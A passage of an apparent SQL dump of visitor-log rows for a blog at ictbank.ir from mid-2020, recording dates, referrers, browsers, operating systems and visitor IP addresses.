(3306,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.75.35.229','000',0,1,0),
(3307,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.135','000',0,1,0),
(3308,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.101.13.141','000',0,1,0),
(3309,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','83.170.125.84','000',0,1,0),
(3310,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.208.64','000',0,1,0),
(3311,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.170.40.181','000',0,1,0),
(3312,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.208.130','000',0,1,0),
(3313,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.146.164','000',0,1,0),
(3314,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.35.61','000',0,1,0),
(3315,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','132.148.104.149','000',0,1,0),
(3316,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.227.248.129','000',0,1,0),
(3317,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.136','000',0,1,0),
(3318,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.114.116.5','000',0,1,0),
(3319,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','31.192.208.186','000',0,1,0),
(3320,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','72.34.58.212','000',0,1,0),
(3321,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.126.66','000',0,1,0),
(3322,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','81.88.49.44','000',0,1,0),
(3323,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','202.154.40.18','000',0,1,0),
(3324,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.166.167','000',0,1,0),
(3325,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.43.15.144','000',0,1,0),
(3326,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','142.44.198.19','000',0,1,0),
(3327,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.252.181.42','000',0,1,0),
(3328,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.182.224.44','000',0,1,0),
(3329,'2020-06-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.226','000',0,1,0),
(3330,'2020-06-30','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,2,0),
(3331,'2020-06-30','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','162.213.36.97','000',0,1,0),
(3332,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.96.36','000',0,1,0),
(3333,'2020-06-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3334,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.26.208.234','000',0,1,0),
(3335,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.1.132','000',0,1,0),
(3336,'2020-06-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','37.49.224.229','000',0,1,0),
(3337,'2020-06-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(3338,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.70.226.204','000',0,1,0),
(3339,'2020-07-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(3340,'2020-07-01','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,3,0),
(3341,'2020-07-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.32.160','000',0,1,0),
(3342,'2020-07-01','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','51.11.138.120','000',0,2,0),
(3343,'2020-07-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(3344,'2020-07-01','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','138.91.4.208','000',0,1,0),
(3345,'2020-07-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.177.30','000',0,1,0),
(3346,'2020-07-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.154','000',0,1,0),
(3347,'2020-07-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.39.3','000',0,1,0),
(3348,'2020-07-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.117.138','000',0,1,0),
(3349,'2020-07-01','https://www.google.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','177.159.21.177','000',0,1,0),
(3350,'2020-07-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.60.55','000',0,1,0),
(3351,'2020-07-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.250','000',0,1,0),
(3352,'2020-07-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3353,'2020-07-01','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(3354,'2020-07-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','195.144.21.56','000',0,1,0),
(3355,'2020-07-02','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(3356,'2020-07-02','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(3357,'2020-07-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.35.10','000',0,1,0),
(3358,'2020-07-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(3359,'2020-07-02','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','89.42.209.79','000',0,3,0),
(3360,'2020-07-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.37.102','000',0,1,0),
(3361,'2020-07-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.158.178','000',0,1,0),
(3362,'2020-07-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.56.129','000',0,1,0),
(3363,'2020-07-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.122.240.41','000',0,1,0),
(3364,'2020-07-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(3365,'2020-07-02','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','104.219.52.249','000',0,1,0),
(3366,'2020-07-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(3367,'2020-07-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3368,'2020-07-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','92.118.52.50','000',0,1,0),
(3369,'2020-07-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','66.240.236.119','000',0,1,0),
(3370,'2020-07-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.117.9','000',0,1,0),
(3371,'2020-07-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(3372,'2020-07-03','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','111.206.250.236','000',0,1,0),
(3373,'2020-07-03','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','111.206.250.203','000',0,1,0),
(3374,'2020-07-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.42.198.81','000',0,1,0),
(3375,'2020-07-03','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','129.204.8.130','000',0,1,0),
(3376,'2020-07-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(3377,'2020-07-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','96.127.169.2','000',0,1,0),
(3378,'2020-07-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','145.255.21.51','000',0,6,0),
(3379,'2020-07-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.70.146.168','000',0,1,0),
(3380,'2020-07-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.28.220.151','000',0,1,0),
(3381,'2020-07-03','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','138.91.4.208','000',0,1,0),
(3382,'2020-07-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(3383,'2020-07-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','111.231.141.86','000',0,3,0),
(3384,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.157.14.115','000',0,1,0),
(3385,'2020-07-04','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.253.42.34','000',0,1,0),
(3386,'2020-07-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(3387,'2020-07-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(3388,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.176.166','000',0,1,0),
(3389,'2020-07-04','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','130.61.48.180','000',0,3,0),
(3390,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.165.174.190','000',0,1,0),
(3391,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.82.95','000',0,1,0),
(3392,'2020-07-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(3393,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.208.182','000',0,1,0),
(3394,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.152','000',0,1,0),
(3395,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.175.71.154','000',0,1,0),
(3396,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.156.136','000',0,1,0),
(3397,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.46.200','000',0,1,0),
(3398,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.190.16.70','000',0,1,0),
(3399,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','163.172.53.4','000',0,1,0),
(3400,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.21','000',0,1,0),
(3401,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.120.73','000',0,1,0),
(3402,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.62.206.242','000',0,1,0),
(3403,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,1,0),
(3404,'2020-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.130.32.145','000',0,1,0),
(3405,'2020-07-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','184.179.216.156','000',0,1,0),
(3406,'2020-07-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(3407,'2020-07-05','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','175.184.167.224','000',0,1,0),
(3408,'2020-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.144.141','000',0,1,0),
(3409,'2020-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.213.125','000',0,1,0),
(3410,'2020-07-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(3411,'2020-07-05','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','37.193.199.123','000',0,1,0),
(3412,'2020-07-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3413,'2020-07-05','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.36.81.51','000',0,1,0),
(3414,'2020-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.111.92','000',0,1,0),
(3415,'2020-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.240.191.163','000',0,2,0),
(3416,'2020-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.7','000',0,2,0),
(3417,'2020-07-05','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','207.154.209.193','000',0,1,0),
(3418,'2020-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.185.233','000',0,1,0),
(3419,'2020-07-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(3420,'2020-07-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','37.49.224.229','000',0,1,0),
(3421,'2020-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','123.30.238.187','000',0,2,0),
(3422,'2020-07-05','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(3423,'2020-07-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.158.178','000',0,1,0),
(3424,'2020-07-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.193.251.225','000',0,1,0),
(3425,'2020-07-06','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','138.91.4.208','000',0,1,0),
(3426,'2020-07-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.2.229','000',0,1,0),
(3427,'2020-07-06','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','40.74.92.104','000',0,1,0),
(3428,'2020-07-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.109.194','000',0,1,0),
(3429,'2020-07-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(3430,'2020-07-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.10.121','000',0,1,0),
(3431,'2020-07-06','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','69.164.111.198','000',0,1,0),
(3432,'2020-07-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.159.241','000',0,1,0),
(3433,'2020-07-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(3434,'2020-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.83.78','000',0,1,0),
(3435,'2020-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.53.171','000',0,1,0),
(3436,'2020-07-07','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','101.254.159.140','000',0,2,0),
(3437,'2020-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.199.95.142','000',0,2,0),
(3438,'2020-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.140.88','000',0,1,0),
(3439,'2020-07-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.138','000',0,1,0),
(3440,'2020-07-07','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','162.213.37.166','000',0,1,0),
(3441,'2020-07-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(3442,'2020-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.221.213','000',0,1,0),
(3443,'2020-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.244.183','000',0,1,0),
(3444,'2020-07-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(3445,'2020-07-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(3446,'2020-07-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','145.255.21.51','000',0,6,0),
(3447,'2020-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.128','000',0,2,0),
(3448,'2020-07-08','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','111.229.131.238','000',0,3,0),
(3449,'2020-07-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.40.166.168','000',0,2,0),
(3450,'2020-07-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(3451,'2020-07-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3452,'2020-07-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','145.239.10.50','000',0,2,0),
(3453,'2020-07-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.223.138','000',0,1,0),
(3454,'2020-07-08','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','69.164.111.198','000',0,4,0),
(3455,'2020-07-08','http://design-arena.ir/','Edge','Unknown','Unknown',NULL,NULL,'','213.231.51.171','000',0,1,0),
(3456,'2020-07-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.20.41','000',0,1,0),
(3457,'2020-07-08','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','220.248.20.74','000',0,3,0),
(3458,'2020-07-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.9.93','000',0,1,0),
(3459,'2020-07-08','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.234.130.107','000',0,3,0),
(3460,'2020-07-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.121.73','000',0,1,0),
(3461,'2020-07-08','http://ictbank.ir/blog','Firefox','Unknown','Unknown',NULL,NULL,'','124.206.180.133','000',0,1,0),
(3462,'2020-07-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(3463,'2020-07-08','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(3464,'2020-07-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','66.228.33.237','000',0,1,0),
(3465,'2020-07-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(3466,'2020-07-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(3467,'2020-07-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(3468,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.230.120','000',0,1,0),
(3469,'2020-07-09','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','40.74.92.104','000',0,1,0),
(3470,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.13.139','000',0,1,0),
(3471,'2020-07-09','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','91.135.244.217','000',0,3,0),
(3472,'2020-07-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(3473,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.209.210','000',0,1,0),
(3474,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.105.123','000',0,1,0),
(3475,'2020-07-09','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','142.93.186.172','000',0,1,0),
(3476,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.197.201.45','000',0,1,0),
(3477,'2020-07-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(3478,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','72.167.232.160','000',0,1,0),
(3479,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.113.111.80','000',0,1,0),
(3480,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','164.132.170.133','000',0,1,0),
(3481,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.170.44.152','000',0,1,0),
(3482,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.194.158','000',0,1,0),
(3483,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.157.147.50','000',0,1,0),
(3484,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.35','000',0,1,0),
(3485,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.187.78.180','000',0,1,0),
(3486,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.142','000',0,1,0),
(3487,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.46.124','000',0,1,0),
(3488,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.211.57.114','000',0,1,0),
(3489,'2020-07-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','158.140.137.39','000',0,1,0),
(3490,'2020-07-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(3491,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','68.65.123.76','000',0,1,0),
(3492,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.79','000',0,1,0),
(3493,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','27.71.226.143','000',0,1,0),
(3494,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.208.182','000',0,1,0),
(3495,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.21','000',0,1,0),
(3496,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.62.176.241','000',0,1,0),
(3497,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.91.70.89','000',0,1,0),
(3498,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.91.70.69','000',0,1,0),
(3499,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.90.144.101','000',0,1,0),
(3500,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.187','000',0,1,0),
(3501,'2020-07-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.130.80.28','000',0,1,0),
(3502,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(3503,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.159.25.231','000',0,1,0),
(3504,'2020-07-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(3505,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.152.72','000',0,1,0),
(3506,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.149.76.184','000',0,1,0),
(3507,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','148.72.211.168','000',0,1,0),
(3508,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','132.148.104.132','000',0,1,0),
(3509,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','203.205.21.159','000',0,1,0),
(3510,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','149.56.44.141','000',0,1,0),
(3511,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.141.47.24','000',0,1,0),
(3512,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.14','000',0,1,0),
(3513,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.239.6','000',0,1,0),
(3514,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.249.226.67','000',0,1,0),
(3515,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.25.184.137','000',0,1,0),
(3516,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.19','000',0,1,0),
(3517,'2020-07-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.234','000',0,1,0),
(3518,'2020-07-10','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.75','000',0,2,0),
(3519,'2020-07-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.150.242','000',0,1,0),
(3520,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.128','000',0,2,0),
(3521,'2020-07-10','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','37.193.93.157','000',0,1,0),
(3522,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.36.19.73','000',0,1,0),
(3523,'2020-07-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3524,'2020-07-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.34.192','000',0,1,0),
(3525,'2020-07-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(3526,'2020-07-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(3527,'2020-07-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.27.19','000',0,2,0),
(3528,'2020-07-11','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.154.47.2','000',0,1,0),
(3529,'2020-07-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','18.219.156.232','000',0,32,0),
(3530,'2020-07-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.157.160.100','000',0,1,0),
(3531,'2020-07-11','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','188.242.67.113','000',0,1,0),
(3532,'2020-07-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(3533,'2020-07-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.164.153.23','000',0,1,0),
(3534,'2020-07-11','http://ictbank.ir/blog','Firefox','OS X','10.8',NULL,NULL,'','37.193.199.123','000',0,1,0),
